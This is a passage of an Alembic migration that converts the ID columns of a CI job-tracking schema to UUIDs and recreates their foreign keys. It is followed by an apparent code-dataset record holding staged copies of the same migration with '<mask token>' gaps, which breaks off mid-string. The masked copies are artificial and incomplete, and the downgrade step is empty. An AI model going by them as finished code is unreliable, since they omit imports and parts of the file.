['id'], ondelete='CASCADE') op.create_foreign_key('jobdefinition_tests_test_id_fkey', 'jobdefinition_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobdefinitions_topic_id_fkey', 'jobdefinitions', 'topics', ['topic_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_team_id_fkey', 'jobs', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_jobdefinition_id_fkey', 'jobs', 'jobdefinitions', ['jobdefinition_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_remoteci_id_fkey', 'jobs', 'remotecis', ['remoteci_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_previous_job_id_fkey', 'jobs', 'jobs', ['previous_job_id'], ['id']) op.create_foreign_key('jobs_components_component_id_fkey', 'jobs_components', 'components', ['component_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_components_job_id_fkey', 'jobs_components', 'jobs', ['job_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_issues_issue_id_fkey', 'jobs_issues', 'issues', ['issue_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobs_issues_job_id_fkey', 'jobs_issues', 'jobs', ['job_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobstates_team_id_fkey', 'jobstates', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('jobstates_job_id_fkey', 'jobstates', 'jobs', ['job_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('logs_team_id_fkey', 'logs', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('logs_user_id_fkey', 'logs', 'users', ['user_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('metas_job_id_fkey', 'metas', 'jobs', ['job_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('remoteci_tests_test_id_fkey', 'remoteci_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('remoteci_tests_remoteci_id_fkey', 'remoteci_tests', 'remotecis', ['remoteci_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('remotecis_team_id_fkey', 'remotecis', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('tests_team_id_fkey', 'tests', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('topic_tests_test_id_fkey', 'topic_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('topic_tests_topic_id_fkey', 'topic_tests', 'topics', ['topic_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('topics_next_topic_fkey', 'topics', 'topics', ['next_topic'], ['id']) op.create_foreign_key('topics_teams_topic_id_fkey', 'topics_teams', 'topics', ['topic_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('topics_teams_team_id_fkey', 'topics_teams', 'teams', ['team_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('user_remotecis_user_id_fkey', 'user_remotecis', 'users', ['user_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('user_remotecis_remoteci_id_fkey', 'user_remotecis', 'remotecis', ['remoteci_id'], ['id'], ondelete='CASCADE') op.create_foreign_key('users_team_id_fkey', 'users', 'teams', ['team_id'], ['id'], ondelete='CASCADE') def downgrade(): pass
normal
{ "blob_id": "a34584a71fdff65e5b1bb15a6304af79774dac2c", "index": 1315, "step-1": "<mask token>\n\n\ndef upgrade():\n op.drop_constraint('component_files_component_id_fkey', 'component_files')\n op.drop_constraint('components_topic_id_fkey', 'components')\n op.drop_constraint('files_job_id_fkey', 'files')\n op.drop_constraint('files_jobstate_id_fkey', 'files')\n op.drop_constraint('files_team_id_fkey', 'files')\n op.drop_constraint('files_test_id_fkey', 'files')\n op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions')\n op.drop_constraint('jobs_team_id_fkey', 'jobs')\n op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs')\n op.drop_constraint('jobs_remoteci_id_fkey', 'jobs')\n op.drop_constraint('jobs_previous_job_id_fkey', 'jobs')\n op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues')\n op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues')\n op.drop_constraint('jobstates_team_id_fkey', 'jobstates')\n op.drop_constraint('jobstates_job_id_fkey', 'jobstates')\n op.drop_constraint('logs_team_id_fkey', 'logs')\n op.drop_constraint('logs_user_id_fkey', 'logs')\n op.drop_constraint('metas_job_id_fkey', 'metas')\n op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests')\n op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests')\n op.drop_constraint('remotecis_team_id_fkey', 'remotecis')\n op.drop_constraint('tests_team_id_fkey', 'tests')\n op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests')\n op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests')\n op.drop_constraint('topics_next_topic_fkey', 'topics')\n op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams')\n op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams')\n op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis')\n op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis')\n op.drop_constraint('users_team_id_fkey', 'users')\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN jobstate_id TYPE UUID USING jobstate_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE issues ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE UUID USING previous_job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE UUID USING issue_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE teams ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN next_topic TYPE UUID USING next_topic::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.create_foreign_key('component_files_component_id_fkey',\n 'component_files', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('components_topic_id_fkey', 'components',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_job_id_fkey', 'files', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_jobstate_id_fkey', 'files', 'jobstates', [\n 'jobstate_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_team_id_fkey', 'files', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_test_id_fkey', 'files', 'tests', [\n 'test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests', 'jobdefinitions', ['jobdefinition_id'], [\n 'id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE'\n )\n op.create_foreign_key('jobdefinitions_topic_id_fkey', 'jobdefinitions',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_team_id_fkey', 'jobs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_jobdefinition_id_fkey', 'jobs',\n 'jobdefinitions', ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_remoteci_id_fkey', 'jobs', 'remotecis', [\n 'remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_previous_job_id_fkey', 'jobs', 'jobs', [\n 'previous_job_id'], ['id'])\n op.create_foreign_key('jobs_components_component_id_fkey',\n 'jobs_components', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('jobs_components_job_id_fkey', 'jobs_components',\n 'jobs', ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_issue_id_fkey', 'jobs_issues',\n 'issues', ['issue_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_job_id_fkey', 'jobs_issues', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_team_id_fkey', 'jobstates', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_job_id_fkey', 'jobstates', 'jobs', [\n 'job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_team_id_fkey', 'logs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_user_id_fkey', 'logs', 'users', ['user_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('metas_job_id_fkey', 'metas', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_test_id_fkey', 'remoteci_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_remoteci_id_fkey',\n 'remoteci_tests', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('remotecis_team_id_fkey', 'remotecis', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('tests_team_id_fkey', 'tests', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_test_id_fkey', 'topic_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_topic_id_fkey', 'topic_tests',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_next_topic_fkey', 'topics', 'topics', [\n 'next_topic'], ['id'])\n op.create_foreign_key('topics_teams_topic_id_fkey', 'topics_teams',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_teams_team_id_fkey', 'topics_teams',\n 'teams', ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_user_id_fkey', 'user_remotecis',\n 'users', ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_remoteci_id_fkey',\n 'user_remotecis', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('users_team_id_fkey', 'users', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef upgrade():\n op.drop_constraint('component_files_component_id_fkey', 'component_files')\n op.drop_constraint('components_topic_id_fkey', 'components')\n op.drop_constraint('files_job_id_fkey', 'files')\n op.drop_constraint('files_jobstate_id_fkey', 'files')\n op.drop_constraint('files_team_id_fkey', 'files')\n op.drop_constraint('files_test_id_fkey', 'files')\n op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions')\n op.drop_constraint('jobs_team_id_fkey', 'jobs')\n op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs')\n op.drop_constraint('jobs_remoteci_id_fkey', 'jobs')\n op.drop_constraint('jobs_previous_job_id_fkey', 'jobs')\n op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues')\n op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues')\n op.drop_constraint('jobstates_team_id_fkey', 'jobstates')\n op.drop_constraint('jobstates_job_id_fkey', 'jobstates')\n op.drop_constraint('logs_team_id_fkey', 'logs')\n op.drop_constraint('logs_user_id_fkey', 'logs')\n op.drop_constraint('metas_job_id_fkey', 'metas')\n op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests')\n op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests')\n op.drop_constraint('remotecis_team_id_fkey', 'remotecis')\n op.drop_constraint('tests_team_id_fkey', 'tests')\n op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests')\n op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests')\n op.drop_constraint('topics_next_topic_fkey', 'topics')\n op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams')\n op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams')\n op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis')\n op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis')\n op.drop_constraint('users_team_id_fkey', 'users')\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN jobstate_id TYPE UUID USING jobstate_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE files ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE issues ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinition_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobdefinitions ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN jobdefinition_id TYPE UUID USING jobdefinition_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs ALTER COLUMN previous_job_id TYPE UUID USING previous_job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_components ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobs_issues ALTER COLUMN issue_id TYPE UUID USING issue_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE jobstates ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE logs ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE metas ALTER COLUMN job_id TYPE UUID USING job_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remoteci_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE remotecis ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE teams ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE tests ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topic_tests ALTER COLUMN test_id TYPE UUID USING test_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics ALTER COLUMN next_topic TYPE UUID USING next_topic::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 'ALTER TABLE topics_teams ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN user_id TYPE UUID USING user_id::uuid'\n )\n op.execute(\n 'ALTER TABLE user_remotecis ALTER COLUMN remoteci_id TYPE UUID USING remoteci_id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE users ALTER COLUMN team_id TYPE UUID USING team_id::uuid'\n )\n op.create_foreign_key('component_files_component_id_fkey',\n 'component_files', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('components_topic_id_fkey', 'components',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_job_id_fkey', 'files', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_jobstate_id_fkey', 'files', 'jobstates', [\n 'jobstate_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_team_id_fkey', 'files', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('files_test_id_fkey', 'files', 'tests', [\n 'test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests', 'jobdefinitions', ['jobdefinition_id'], [\n 'id'], ondelete='CASCADE')\n op.create_foreign_key('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests', 'tests', ['test_id'], ['id'], ondelete='CASCADE'\n )\n op.create_foreign_key('jobdefinitions_topic_id_fkey', 'jobdefinitions',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_team_id_fkey', 'jobs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_jobdefinition_id_fkey', 'jobs',\n 'jobdefinitions', ['jobdefinition_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_remoteci_id_fkey', 'jobs', 'remotecis', [\n 'remoteci_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_previous_job_id_fkey', 'jobs', 'jobs', [\n 'previous_job_id'], ['id'])\n op.create_foreign_key('jobs_components_component_id_fkey',\n 'jobs_components', 'components', ['component_id'], ['id'], ondelete\n ='CASCADE')\n op.create_foreign_key('jobs_components_job_id_fkey', 'jobs_components',\n 'jobs', ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_issue_id_fkey', 'jobs_issues',\n 'issues', ['issue_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobs_issues_job_id_fkey', 'jobs_issues', 'jobs',\n ['job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_team_id_fkey', 'jobstates', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('jobstates_job_id_fkey', 'jobstates', 'jobs', [\n 'job_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_team_id_fkey', 'logs', 'teams', ['team_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('logs_user_id_fkey', 'logs', 'users', ['user_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('metas_job_id_fkey', 'metas', 'jobs', ['job_id'],\n ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_test_id_fkey', 'remoteci_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('remoteci_tests_remoteci_id_fkey',\n 'remoteci_tests', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('remotecis_team_id_fkey', 'remotecis', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('tests_team_id_fkey', 'tests', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_test_id_fkey', 'topic_tests',\n 'tests', ['test_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topic_tests_topic_id_fkey', 'topic_tests',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_next_topic_fkey', 'topics', 'topics', [\n 'next_topic'], ['id'])\n op.create_foreign_key('topics_teams_topic_id_fkey', 'topics_teams',\n 'topics', ['topic_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('topics_teams_team_id_fkey', 'topics_teams',\n 'teams', ['team_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_user_id_fkey', 'user_remotecis',\n 'users', ['user_id'], ['id'], ondelete='CASCADE')\n op.create_foreign_key('user_remotecis_remoteci_id_fkey',\n 'user_remotecis', 'remotecis', ['remoteci_id'], ['id'], ondelete=\n 'CASCADE')\n op.create_foreign_key('users_team_id_fkey', 'users', 'teams', [\n 'team_id'], ['id'], ondelete='CASCADE')\n\n\ndef downgrade():\n pass\n", "step-3": "<mask token>\nrevision = '1bb42ff54435'\ndown_revision = '6bbbf58ed9de'\nbranch_labels = None\ndepends_on = None\n<mask token>\n\n\ndef upgrade():\n op.drop_constraint('component_files_component_id_fkey', 'component_files')\n op.drop_constraint('components_topic_id_fkey', 'components')\n op.drop_constraint('files_job_id_fkey', 'files')\n op.drop_constraint('files_jobstate_id_fkey', 'files')\n op.drop_constraint('files_team_id_fkey', 'files')\n op.drop_constraint('files_test_id_fkey', 'files')\n op.drop_constraint('jobdefinition_tests_jobdefinition_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinition_tests_test_id_fkey',\n 'jobdefinition_tests')\n op.drop_constraint('jobdefinitions_topic_id_fkey', 'jobdefinitions')\n op.drop_constraint('jobs_team_id_fkey', 'jobs')\n op.drop_constraint('jobs_jobdefinition_id_fkey', 'jobs')\n op.drop_constraint('jobs_remoteci_id_fkey', 'jobs')\n op.drop_constraint('jobs_previous_job_id_fkey', 'jobs')\n op.drop_constraint('jobs_components_component_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_components_job_id_fkey', 'jobs_components')\n op.drop_constraint('jobs_issues_issue_id_fkey', 'jobs_issues')\n op.drop_constraint('jobs_issues_job_id_fkey', 'jobs_issues')\n op.drop_constraint('jobstates_team_id_fkey', 'jobstates')\n op.drop_constraint('jobstates_job_id_fkey', 'jobstates')\n op.drop_constraint('logs_team_id_fkey', 'logs')\n op.drop_constraint('logs_user_id_fkey', 'logs')\n op.drop_constraint('metas_job_id_fkey', 'metas')\n op.drop_constraint('remoteci_tests_test_id_fkey', 'remoteci_tests')\n op.drop_constraint('remoteci_tests_remoteci_id_fkey', 'remoteci_tests')\n op.drop_constraint('remotecis_team_id_fkey', 'remotecis')\n op.drop_constraint('tests_team_id_fkey', 'tests')\n op.drop_constraint('topic_tests_test_id_fkey', 'topic_tests')\n op.drop_constraint('topic_tests_topic_id_fkey', 'topic_tests')\n op.drop_constraint('topics_next_topic_fkey', 'topics')\n op.drop_constraint('topics_teams_topic_id_fkey', 'topics_teams')\n op.drop_constraint('topics_teams_team_id_fkey', 'topics_teams')\n op.drop_constraint('user_remotecis_user_id_fkey', 'user_remotecis')\n op.drop_constraint('user_remotecis_remoteci_id_fkey', 'user_remotecis')\n op.drop_constraint('users_team_id_fkey', 'users')\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN component_id TYPE UUID USING component_id::uuid'\n )\n op.execute(\n 'ALTER TABLE component_files ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN id TYPE UUID USING id::uuid'\n )\n op.execute(\n 'ALTER TABLE components ALTER COLUMN topic_id TYPE UUID USING topic_id::uuid'\n )\n op.execute(\n 